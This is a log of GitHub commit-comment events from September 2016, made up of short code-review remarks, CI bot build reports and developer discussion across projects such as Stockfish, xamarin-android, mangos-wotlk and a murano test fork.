{"id":"4562523559","type":"CommitCommentEvent","actor":{"login":"dboissin"},"repo":{"name":"OPEN-ENT-NG/fake-sso"},"payload":{"comment":{"id":19020535,"position":135,"line":135,"path":"src/main/java/fr/wseduc/sso/controllers/Pronote.java","commit_id":"b2406ac931f2c9659c2d0f0865380245e5e0f1ae","created_at":"2016-09-14T15:02:36Z","updated_at":"2016-09-14T15:02:36Z","body":"Attention, URI.create masque le fait qu'un exception va être levée si la string n'est pas valide. Car, il catch la checked exception pour lever une runtime exception.\r\nDans ce cas, c'est dangereux de ne pas traiter l'exception. Par expérience, ça arrive régulièrement que des uri non valides soient configurées dans la console. Si c'est le cas, la requête va rester en pending."}},"created_at":"2016-09-14T15:02:36Z"}
{"id":"4562523651","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19020536,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T15:02:37Z","updated_at":"2016-09-14T15:02:37Z","body":"      dbg_mean_of(popcount(b) == 0);    ==> Total 3565476 Mean 0.232713\r\n      dbg_mean_of(popcount(b) == 1);    ==> Total 3565476 Mean 0.423814\r\n      dbg_mean_of(popcount(b) == 2);    ==> Total 3565476 Mean 0.18583\r\n      dbg_mean_of(popcount(b) == 3);    ==> Total 3565476 Mean 0.133712\r\n      dbg_mean_of(popcount(b) == 4);    ==> Total 3565476 Mean 0.0227942\r\n      dbg_mean_of(popcount(b) == 5);    ==> Total 3565476 Mean 0.00113197\r\n      dbg_mean_of(popcount(b) == 6);    ==> Total 3565476 Mean 5.32888e-06\r\n\r\nJust for the fun of it, two of the positions with six pieces between the slider \r\nand the target:\r\n\r\n````\r\n +---+---+---+---+---+---+---+---+\r\n | q |   |   |   |   | r |   | k |\r\n +---+---+---+---+---+---+---+---+\r\n |   | p | p | b |   |   | p |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   | p | n | p |   |   |   | p |\r\n +---+---+---+---+---+---+---+---+\r\n | r |   |   | B | p |   |   | Q |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   | P | p |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n | P |   |   | P |   | P |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   | P | P |   | N |   | P | P |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   | R |   |   | R | K |\r\n +---+---+---+---+---+---+---+---+\r\n\r\nFen: q4r1k/1ppb2p1/1pnp3p/r2Bp2Q/4Pp2/P2P1P2/1PP1N1PP/3R2RK b - - 4 19\r\n````\r\n\r\n````\r\n +---+---+---+---+---+---+---+---+\r\n | r |   |   | q |   |   |   | k |\r\n +---+---+---+---+---+---+---+---+\r\n |   | p | p | b |   |   | p | p |\r\n +---+---+---+---+---+---+---+---+\r\n |   | p |   | p |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   | B | p |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   | n | P | r |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   | P |   |   | Q |   |\r\n +---+---+---+---+---+---+---+---+\r\n | P | P | P | N |   | P | K | P |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   | R |   |   | R |   |\r\n +---+---+---+---+---+---+---+---+\r\n\r\nFen: r2q3k/1ppb2pp/1p1p4/3Bp3/3nPr2/3P2Q1/PPPN1PKP/3R2R1 b - - 8 20\r\nKey: 1B64BCC84D0CA493\r\nCheckers: \r\n````\r\n"}},"created_at":"2016-09-14T15:02:37Z"}
{"id":"4562527486","type":"CommitCommentEvent","actor":{"login":"martinwiboe"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":19020543,"position":null,"line":null,"path":null,"commit_id":"3675c5c6a6a5b9f0c65106e7ab5b08358c5fc82a","created_at":"2016-09-14T15:03:11Z","updated_at":"2016-09-14T15:03:11Z","body":"@swert-hon Yup, but `b.AbsoluteUri` should throw an exception"}},"created_at":"2016-09-14T15:03:11Z"}
{"id":"4562531246","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19020553,"position":9,"line":235,"path":"plugins/CuraEngineBackend/CuraEngineBackend.py","commit_id":"76e57c940d9b8535ea71696f4ceddaf07f13296f","created_at":"2016-09-14T15:03:43Z","updated_at":"2016-09-14T15:03:43Z","body":"The issue states that the user should still be able to experiment with incompatible materials. Is that now changed?"}},"created_at":"2016-09-14T15:03:43Z"}
{"id":"4562535422","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020566,"position":68,"line":68,"path":"murano/tests/unit/api/v1/test_instance_statistics.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T15:04:20Z","updated_at":"2016-09-14T15:04:20Z","body":"Maybe make not random number"}},"created_at":"2016-09-14T15:04:20Z"}
{"id":"4562535690","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19020567,"position":5,"line":147,"path":"src/game/AI/CreatureAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T15:04:22Z","updated_at":"2016-09-14T15:04:22Z","body":"Ok i see. I didnt thought about those cases.\r\nWell anyway i think its better to not read thoses flags but to avoid it i see that some implementation is needed because we dont support it in state. But iam not sure. Do those creature are not accompagned with an aura that apply root or such? Usualy its the way blizz hanfle that case.\r\nSo in short, its ok to use it but may be improved in future."}},"created_at":"2016-09-14T15:04:22Z"}
{"id":"4562535760","type":"CommitCommentEvent","actor":{"login":"sivajyothisaladi"},"repo":{"name":"sivajyothisaladi/sairam"},"payload":{"comment":{"id":19020569,"position":null,"line":null,"path":null,"commit_id":"7b175cb1f1ed53b2282cfa0654d01e006e4c314a","created_at":"2016-09-14T15:04:23Z","updated_at":"2016-09-14T15:04:23Z","body":"user"}},"created_at":"2016-09-14T15:04:23Z"}
{"id":"4562536841","type":"CommitCommentEvent","actor":{"login":"sivajyothisaladi"},"repo":{"name":"sivajyothisaladi/sairam"},"payload":{"comment":{"id":19020571,"position":null,"line":null,"path":null,"commit_id":"7b175cb1f1ed53b2282cfa0654d01e006e4c314a","created_at":"2016-09-14T15:04:32Z","updated_at":"2016-09-14T15:04:32Z","body":"user details"}},"created_at":"2016-09-14T15:04:32Z"}
{"id":"4562547064","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020589,"position":53,"line":53,"path":"murano/tests/unit/api/v1/test_services.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T15:05:55Z","updated_at":"2016-09-14T15:05:55Z","body":"Remove print"}},"created_at":"2016-09-14T15:05:55Z"}
{"id":"4562550778","type":"CommitCommentEvent","actor":{"login":"aq1018"},"repo":{"name":"aq1018/mongoid-history"},"payload":{"comment":{"id":19020596,"position":null,"line":null,"path":null,"commit_id":"75c200fba411530047c1c23a750aff05f93ac836","created_at":"2016-09-14T15:06:29Z","updated_at":"2016-09-14T15:06:29Z","body":"@dblock Sorry, didn't see your request until now. Either way is fine by me. ( Never thought this gem would be this successful )"}},"created_at":"2016-09-14T15:06:29Z"}
{"id":"4562551406","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020597,"position":35,"line":35,"path":"murano/tests/unit/api/v1/test_services.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T15:06:35Z","updated_at":"2016-09-14T15:06:35Z","body":"Remove _1"}},"created_at":"2016-09-14T15:06:35Z"}
{"id":"4562555001","type":"CommitCommentEvent","actor":{"login":"shlevy"},"repo":{"name":"NixOS/nix"},"payload":{"comment":{"id":19020614,"position":12,"line":1091,"path":"src/libutil/util.cc","commit_id":"a75d11a7e6984b3df15da9677fbd49ee8de7a9c3","created_at":"2016-09-14T15:07:03Z","updated_at":"2016-09-14T15:07:03Z","body":"Not a big deal, but this would be more efficient if it just took a `std::string` instead of a ref, since that could be moved from in some cases (and we're always going to copy anyway)."}},"created_at":"2016-09-14T15:07:03Z"}
{"id":"4562556377","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020622,"position":168,"line":168,"path":"murano/tests/unit/api/v1/test_services.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T15:07:17Z","updated_at":"2016-09-14T15:07:17Z","body":"Remove print"}},"created_at":"2016-09-14T15:07:17Z"}
{"id":"4562556854","type":"CommitCommentEvent","actor":{"login":"dotcoo"},"repo":{"name":"dotcoo/LuaSocketEvent"},"payload":{"comment":{"id":19020624,"position":null,"line":null,"path":null,"commit_id":"d15345e4046995afb64894383794749d268cbb25","created_at":"2016-09-14T15:07:21Z","updated_at":"2016-09-14T15:07:21Z","body":"好像是哦 我改改"}},"created_at":"2016-09-14T15:07:21Z"}
{"id":"4562557943","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020627,"position":145,"line":145,"path":"murano/tests/unit/api/v1/test_services.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T15:07:30Z","updated_at":"2016-09-14T15:07:30Z","body":"Remove print"}},"created_at":"2016-09-14T15:07:30Z"}
{"id":"4562560188","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020631,"position":203,"line":203,"path":"murano/tests/unit/api/v1/test_services.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T15:07:48Z","updated_at":"2016-09-14T15:07:48Z","body":"Remove print"}},"created_at":"2016-09-14T15:07:48Z"}
{"id":"4562562557","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19020634,"position":17,"line":1388,"path":"src/game/AI/CreatureEventAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T15:08:09Z","updated_at":"2016-09-14T15:08:09Z","body":"i meant that check was used in petai, so it may be a good idea tu use it. About the wrapper its alway a good idea even more when its possible in near future that we'll change the access to that field to use UNIT_STAT instead."}},"created_at":"2016-09-14T15:08:09Z"}
{"id":"4562563320","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":19020637,"position":null,"line":null,"path":null,"commit_id":"d85859d1d95bd0206a533542a5ecb47242bfe1ff","created_at":"2016-09-14T15:08:16Z","updated_at":"2016-09-14T15:08:16Z","body":"Git hates me"}},"created_at":"2016-09-14T15:08:16Z"}
{"id":"4562565060","type":"CommitCommentEvent","actor":{"login":"swert-hon"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":19020648,"position":null,"line":null,"path":null,"commit_id":"3675c5c6a6a5b9f0c65106e7ab5b08358c5fc82a","created_at":"2016-09-14T15:08:30Z","updated_at":"2016-09-14T15:08:30Z","body":"@martinwiboe Sorry, I realize my mistake now. `var r` in my sample is still an absolute Uri, and a relative Uri would get its base address from the HttpClient."}},"created_at":"2016-09-14T15:08:30Z"}
{"id":"4562567737","type":"CommitCommentEvent","actor":{"login":"flug"},"repo":{"name":"greg0ire/enum"},"payload":{"comment":{"id":19020651,"position":null,"line":null,"path":null,"commit_id":"1b3ecfc2e53a323eb8a28e09b7267e4c813e0ba2","created_at":"2016-09-14T15:08:52Z","updated_at":"2016-09-14T15:08:52Z","body":"It's very crazy this hack :scream:"}},"created_at":"2016-09-14T15:08:52Z"}
{"id":"4562568024","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020652,"position":101,"line":173,"path":"murano/tests/unit/api/v1/test_sessions.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T15:08:55Z","updated_at":"2016-09-14T15:08:55Z","body":"Need an assert"}},"created_at":"2016-09-14T15:08:55Z"}
{"id":"4562569003","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19020653,"position":null,"line":null,"path":null,"commit_id":"3fb9abf55bcd4aa0a7a0b6af17fb5158ee00cc83","created_at":"2016-09-14T15:09:04Z","updated_at":"2016-09-14T15:09:04Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-3fb9abf55bcd4aa0a7a0b6af17fb5158ee00cc83-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-3fb9abf55bcd4aa0a7a0b6af17fb5158ee00cc83-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T15:09:04Z"}
{"id":"4562573105","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-reporter"},"payload":{"comment":{"id":19020659,"position":2,"line":2,"path":"README.md","commit_id":"8913ff281db7b8f8b8b4b46b88ef6ae38d4fae46","created_at":"2016-09-14T15:09:41Z","updated_at":"2016-09-14T15:09:41Z","body":"So, checking I have this right : \r\n -  muvuku : https://github.com/medic/medic-webapp/blob/master/tests/nodeunit/unit/kujua-sms/smsparser.js\r\n - textforms: https://github.com/medic/medic-webapp/blob/master/tests/nodeunit/unit/kujua-sms/textforms_parser.js\r\n - texforms compact: https://github.com/medic/medic-webapp/blob/master/tests/nodeunit/unit/kujua-sms/smsparser_compact_textform.js\r\n\r\nIs that right?\r\nWhich one does SimApp use?"}},"created_at":"2016-09-14T15:09:41Z"}
{"id":"4562573596","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19020660,"position":6,"line":41,"path":"src/game/AI/GuardianAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T15:09:46Z","updated_at":"2016-09-14T15:09:46Z","body":"as i said earlier maybe ask a db dev if it have one of them in their sniff and see if an root aura is applied"}},"created_at":"2016-09-14T15:09:46Z"}
{"id":"4562574452","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020661,"position":1,"line":1,"path":"murano/tests/unit/cmd/test_manage.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T15:09:52Z","updated_at":"2016-09-14T15:09:52Z","body":"DON'T RUN THIS"}},"created_at":"2016-09-14T15:09:52Z"}
{"id":"4562576230","type":"CommitCommentEvent","actor":{"login":"lukasmartinelli"},"repo":{"name":"Murthy10/OSMstream"},"payload":{"comment":{"id":19020670,"position":null,"line":null,"path":null,"commit_id":"8490bd6eecd61c83dd0a10b12ec114e0297c6099","created_at":"2016-09-14T15:10:11Z","updated_at":"2016-09-14T15:10:11Z","body":"You need to tell me later what do you want to do with Kafka ;) ?\r\nStreaming and OSM and Kafka sound cools!\r\n"}},"created_at":"2016-09-14T15:10:11Z"}
{"id":"4562576620","type":"CommitCommentEvent","actor":{"login":"swert-hon"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":19020672,"position":null,"line":null,"path":null,"commit_id":"3a40c8e3d472eff0aa292e48f20b18b185f90e9d","created_at":"2016-09-14T15:10:15Z","updated_at":"2016-09-14T15:10:15Z","body":"[Probably wrong.](https://github.com/xamarin/xamarin-android/commit/3675c5c6a6a5b9f0c65106e7ab5b08358c5fc82a#commitcomment-19020203)"}},"created_at":"2016-09-14T15:10:15Z"}
{"id":"4562579373","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020680,"position":28,"line":44,"path":"murano/tests/unit/common/test_utils.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T15:10:39Z","updated_at":"2016-09-14T15:10:39Z","body":"remove print"}},"created_at":"2016-09-14T15:10:39Z"}
{"id":"4562579419","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19020681,"position":14,"line":48,"path":"src/game/AI/GuardianAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T15:10:39Z","updated_at":"2016-09-14T15:10:39Z","body":"this change should be done at AISelector."}},"created_at":"2016-09-14T15:10:39Z"}
{"id":"4562580848","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020685,"position":31,"line":47,"path":"murano/tests/unit/common/test_utils.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T15:10:50Z","updated_at":"2016-09-14T15:10:50Z","body":"remove print"}},"created_at":"2016-09-14T15:10:50Z"}
{"id":"4562580881","type":"CommitCommentEvent","actor":{"login":"greg0ire"},"repo":{"name":"greg0ire/enum"},"payload":{"comment":{"id":19020686,"position":null,"line":null,"path":null,"commit_id":"1b3ecfc2e53a323eb8a28e09b7267e4c813e0ba2","created_at":"2016-09-14T15:10:50Z","updated_at":"2016-09-14T15:10:50Z","body":"Yup. Ugly workaround, I know… but we have no other option for the moment, until the Composer bug is fixed. The thing is, 3.2@dev resolves to dev-master, which is considered > 999"}},"created_at":"2016-09-14T15:10:50Z"}
{"id":"4562583079","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020690,"position":120,"line":136,"path":"murano/tests/unit/common/test_utils.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T15:11:12Z","updated_at":"2016-09-14T15:11:12Z","body":"remove print"}},"created_at":"2016-09-14T15:11:12Z"}
{"id":"4562585017","type":"CommitCommentEvent","actor":{"login":"baltarSC"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":19020695,"position":null,"line":null,"path":null,"commit_id":"1aa326148e1e91aa8c1e013c5c3ecaec11cb42b2","created_at":"2016-09-14T15:11:28Z","updated_at":"2016-09-14T15:11:28Z","body":"the new version of Catchem1.5.3.0  the display eggs this bug"}},"created_at":"2016-09-14T15:11:28Z"}
{"id":"4562585332","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19020696,"position":null,"line":null,"path":null,"commit_id":"e57c7c521e8243a554c9cc96f79ea14b374c536d","created_at":"2016-09-14T15:11:31Z","updated_at":"2016-09-14T15:11:31Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1002](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13279&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 238, ignored: 3 Build time: 00:10:03"}},"created_at":"2016-09-14T15:11:31Z"}
{"id":"4562585649","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19020697,"position":15,"line":36,"path":"src/game/AI/ReactorAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T15:11:34Z","updated_at":"2016-09-14T15:11:34Z","body":"ofc you can but in another commit i mean :) Dont mix cleaning stuff with implementing/fixing stuff."}},"created_at":"2016-09-14T15:11:34Z"}
{"id":"4562586090","type":"CommitCommentEvent","actor":{"login":"maojiang"},"repo":{"name":"maojiang/-"},"payload":{"comment":{"id":19020698,"position":null,"line":null,"path":null,"commit_id":"54b1af6dd56b55522708fc8e1c88fe390fa41023","created_at":"2016-09-14T15:11:37Z","updated_at":"2016-09-14T15:11:37Z","body":"OC开发的，支持文字，照片开发。纯代码写的界面。\r\n网上找了好久，有一位前辈想法和我的类同，学了他的一句核心代码，其他也有参考。"}},"created_at":"2016-09-14T15:11:37Z"}
{"id":"4562591633","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":19020709,"position":206,"line":57,"path":"ui/app.jsx","commit_id":"3f2f3cd2d7d7e2874f470588fb0e41d4fc4b22f1","created_at":"2016-09-14T15:12:26Z","updated_at":"2016-09-14T15:12:26Z","body":"I know I said that you should never use the `id` attribute but the one exception I would make is if you're using the `htmlFor`. Your `<input>` element should have an id the corresponds to that value:\r\n\r\n    <input ref=\"searchBar\" type=\"text\" id=\"searchBar\" />"}},"created_at":"2016-09-14T15:12:26Z"}
{"id":"4562592236","type":"CommitCommentEvent","actor":{"login":"keithcallenberg"},"repo":{"name":"lab7/biobuilds"},"payload":{"comment":{"id":19020710,"position":null,"line":null,"path":null,"commit_id":"91e43ac6afeb1031d244b7dcdf0cc515ed9013c5","created_at":"2016-09-14T15:12:31Z","updated_at":"2016-09-14T15:12:31Z","body":"This looks great. Is there a Dockerfile available for the lab7io/build:biobuilds? I am interested in what is being used for the base of this image. I wrote a basic debian-based image that you can find here: https://github.com/keithcallenberg/BBDocker (though I haven't pushed it to Docker Hub)."}},"created_at":"2016-09-14T15:12:31Z"}
{"id":"4562593093","type":"CommitCommentEvent","actor":{"login":"aschwartz07"},"repo":{"name":"aschwartz07/PeopleModelLibrary"},"payload":{"comment":{"id":19020715,"position":8,"line":14,"path":"PeopleModelTest/Program.cs","commit_id":"c8100890ac3968f64ffbff206d5bbe13792358af","created_at":"2016-09-14T15:12:40Z","updated_at":"2016-09-14T15:12:40Z","body":"**This is a Great Change!**"}},"created_at":"2016-09-14T15:12:40Z"}
{"id":"4562594905","type":"CommitCommentEvent","actor":{"login":"aschwartz07"},"repo":{"name":"aschwartz07/PeopleModelLibrary"},"payload":{"comment":{"id":19020720,"position":8,"line":14,"path":"PeopleModelTest/Program.cs","commit_id":"c8100890ac3968f64ffbff206d5bbe13792358af","created_at":"2016-09-14T15:12:57Z","updated_at":"2016-09-14T15:12:57Z","body":"*I KNOW RIGHT*"}},"created_at":"2016-09-14T15:12:57Z"}
{"id":"4562602967","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19020737,"position":null,"line":null,"path":null,"commit_id":"b80872efa4d49e6d7f537d43b37e0eeae2732dc7","created_at":"2016-09-14T15:14:13Z","updated_at":"2016-09-14T15:14:13Z","body":"[tests/testthat/test_mcmc_nltt.R:74:29:](https://github.com/richelbilderbeek/nLTT/blob/b80872efa4d49e6d7f537d43b37e0eeae2732dc7/tests/testthat/test_mcmc_nltt.R#L74) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt( tree1, LL_BD,c(1, -1), c(TRUE, TRUE),\n                            ^\n```"}},"created_at":"2016-09-14T15:14:13Z"}
{"id":"4562616448","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19020775,"position":36,"line":374,"path":"youtube_dl/options.py","commit_id":"1b6712ab2378b2e8eb59f372fb51193f8d3bdc97","created_at":"2016-09-14T15:16:16Z","updated_at":"2016-09-14T15:16:16Z","body":"i just tried to follow the convention of letting the user decide the number of retries but i guess it's pointless in this case."}},"created_at":"2016-09-14T15:16:16Z"}
{"id":"4562616459","type":"CommitCommentEvent","actor":{"login":"martinwiboe"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":19020776,"position":null,"line":null,"path":null,"commit_id":"3675c5c6a6a5b9f0c65106e7ab5b08358c5fc82a","created_at":"2016-09-14T15:16:16Z","updated_at":"2016-09-14T15:16:16Z","body":"@swert-hon But then using `AbsoluteUri` in `AndroidClientHandler` should be ok, as you said :) I think that's a better solution that escaping urls inside the client handler."}},"created_at":"2016-09-14T15:16:16Z"}
{"id":"4562617784","type":"CommitCommentEvent","actor":{"login":"huitseeker"},"repo":{"name":"SkymindIO/spark"},"payload":{"comment":{"id":19020780,"position":null,"line":null,"path":null,"commit_id":"5374854fde881c382538084e9747067c2b834a36","created_at":"2016-09-14T15:16:27Z","updated_at":"2016-09-14T15:16:27Z","body":"BTW, you've noted that you're requesting a GPU # for your tasks that is equal to your # of CPUs to use ? \r\nhttps://github.com/SkymindIO/spark/commit/5374854fde881c382538084e9747067c2b834a36?w=1#diff-d425d35aa23c47a62fbb538554f2f2cfR276"}},"created_at":"2016-09-14T15:16:27Z"}
{"id":"4562617967","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19020781,"position":5,"line":147,"path":"src/game/AI/CreatureAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T15:16:29Z","updated_at":"2016-09-14T15:16:29Z","body":"You may actually be right about that, the target dummies and other guardians which are not supposed to move could very well have such an aura. I didn't even think of that.\r\n\r\nwell, if there indeed is such a root aura then I do not need the unit flag disable move at all, but I don't think there's any way around unit flag passive on the other hand, though, not without a middleway function just like the one you mentioned (unit->IsPassiveToHostile()) since some mobs need that flag applied permanently."}},"created_at":"2016-09-14T15:16:29Z"}
{"id":"4562619345","type":"CommitCommentEvent","actor":{"login":"dblock"},"repo":{"name":"aq1018/mongoid-history"},"payload":{"comment":{"id":19020783,"position":null,"line":null,"path":null,"commit_id":"75c200fba411530047c1c23a750aff05f93ac836","created_at":"2016-09-14T15:16:41Z","updated_at":"2016-09-14T15:16:41Z","body":"Aaaron @aq1018 !!! You're alive! I forked it, but I can easily undo it. Would you be so kind to transfer this repo to me (@dblock) and I'll move it to the mongoid organization? Thank you."}},"created_at":"2016-09-14T15:16:41Z"}
{"id":"4562620761","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":19020785,"position":207,"line":58,"path":"ui/app.jsx","commit_id":"3f2f3cd2d7d7e2874f470588fb0e41d4fc4b22f1","created_at":"2016-09-14T15:16:54Z","updated_at":"2016-09-14T15:16:54Z","body":"This certainly works, but in React, it's discouraged to read/write directly from/to the DOM. You should attach a `onChange` to the `<input>` element and either use `setState` to hold the value or dispatch an action so your redux store can hold the value:\r\n\r\n    onChange = (e) => {\r\n      this.props.dispatch(setSearch(e.target.value));\r\n    }"}},"created_at":"2016-09-14T15:16:54Z"}
{"id":"4562623670","type":"CommitCommentEvent","actor":{"login":"yneelima"},"repo":{"name":"hillharmon/Zika-Project"},"payload":{"comment":{"id":19020791,"position":null,"line":null,"path":null,"commit_id":"ab76058f8ff4f266acd276e02c2b75fdadf177bb","created_at":"2016-09-14T15:17:22Z","updated_at":"2016-09-14T15:17:22Z","body":"check in to confirm working"}},"created_at":"2016-09-14T15:17:22Z"}
{"id":"4562626316","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020797,"position":17,"line":376,"path":"murano/tests/unit/engine/system/test_agent.py","commit_id":"41dac90ce42cd366b3864c37704a298908b7195f","created_at":"2016-09-14T15:17:45Z","updated_at":"2016-09-14T15:17:45Z","body":"ADD ASSERT\r\n"}},"created_at":"2016-09-14T15:17:45Z"}
{"id":"4562626451","type":"CommitCommentEvent","actor":{"login":"sblanco1"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020798,"position":13,"line":372,"path":"murano/tests/unit/engine/system/test_agent.py","commit_id":"41dac90ce42cd366b3864c37704a298908b7195f","created_at":"2016-09-14T15:17:46Z","updated_at":"2016-09-14T15:17:46Z","body":"Add assertion"}},"created_at":"2016-09-14T15:17:46Z"}
{"id":"4562627242","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020803,"position":11,"line":370,"path":"murano/tests/unit/engine/system/test_agent.py","commit_id":"41dac90ce42cd366b3864c37704a298908b7195f","created_at":"2016-09-14T15:17:53Z","updated_at":"2016-09-14T15:17:53Z","body":"ADD ASSERT"}},"created_at":"2016-09-14T15:17:53Z"}
{"id":"4562627439","type":"CommitCommentEvent","actor":{"login":"sblanco1"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020804,"position":8,"line":367,"path":"murano/tests/unit/engine/system/test_agent.py","commit_id":"41dac90ce42cd366b3864c37704a298908b7195f","created_at":"2016-09-14T15:17:55Z","updated_at":"2016-09-14T15:17:55Z","body":"Add assertion"}},"created_at":"2016-09-14T15:17:55Z"}
